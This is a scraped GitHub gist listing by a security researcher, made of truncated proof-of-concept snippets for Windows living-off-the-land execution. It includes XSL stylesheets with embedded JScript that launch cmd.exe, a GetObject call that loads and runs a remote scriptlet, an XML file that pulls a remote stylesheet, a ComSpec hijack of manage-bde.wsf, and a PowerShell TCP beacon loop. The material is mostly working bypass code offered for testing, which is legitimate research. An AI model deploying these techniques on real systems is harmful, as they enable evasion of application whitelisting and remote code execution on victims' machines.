This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <stylesheet | |
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="placeholder" | |
| version="1.0"> | |
| <output method="text"/> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); | |
| ]]> </ms:script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |
bohops
/ PowerShell TCP_Interval.txt
Created
October 17, 2018 16:42
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| while ($true) { | |
| $(Get-Date).ToUniversalTime() | |
| $Runspace = [runspacefactory]::CreateRunspace() | |
| $PowerShell = [powershell]::Create() | |
| $PowerShell.runspace = $Runspace | |
| $Runspace.Open() | |
| [void]$PowerShell.AddScript({ | |
| $tcpConnection = New-Object System.Net.Sockets.TcpClient('1.1.1.1', 80) | |
| $tcpStream = $tcpConnection.GetStream() |
bohops
/ ProgIDs.txt
Last active
September 26, 2022 23:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| file | |
| StaticMetafile | |
| StaticDib | |
| clsid | |
| objref | |
| ADODB.Command.6.0 | |
| ADODB.Parameter.6.0 | |
| ADODB.Connection.6.0 | |
| ADODB.Recordset.6.0 | |
| ADODB.Error.6.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:u="p" version="1.0"><ms:script implements-prefix="u" language="JScript">r=new ActiveXObject("http://WScript.Shell ").Run("cmd.exe")</ms:script></stylesheet> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32. | |
| Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways. | |
| Here are a few examples that you may or may not find useful - | |
| 1) Replace ComSpec Variable | |
| set comspec=c:\windows\system32\calc.exe | |
| cscript manage-bde.wsf |
bohops
/ activex.txt
Created
February 26, 2018 00:09
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GetObject("script:https://gist.githubusercontent.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct").Exec() |
bohops
/ xsl-notepad.xml
Last active
September 26, 2022 23:29
XSL Testing (++++++ netbiosX and subTee) - https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?> | |
| <customers> | |
| <customer> | |
| <name>Microsoft</name> | |
| </customer> | |
| </customers> |
bohops
/ notepad.sct
Last active
September 26, 2022 23:30
notepad.sct for testing (++++ @subTee and @redcanaryco)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
bohops
/ notepad.xml
Last active
September 26, 2022 23:30
notepad.xml for testing (++++ @subTee and @HarmJ0y)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <command> | |
| <a> | |
| <!-- Proof Of Concept - @subTee --> | |
| <!-- Proof Of Concept - @HarmJ0y --> | |
| <execute>iex notepad.exe</execute> | |
| </a> | |
| </command> |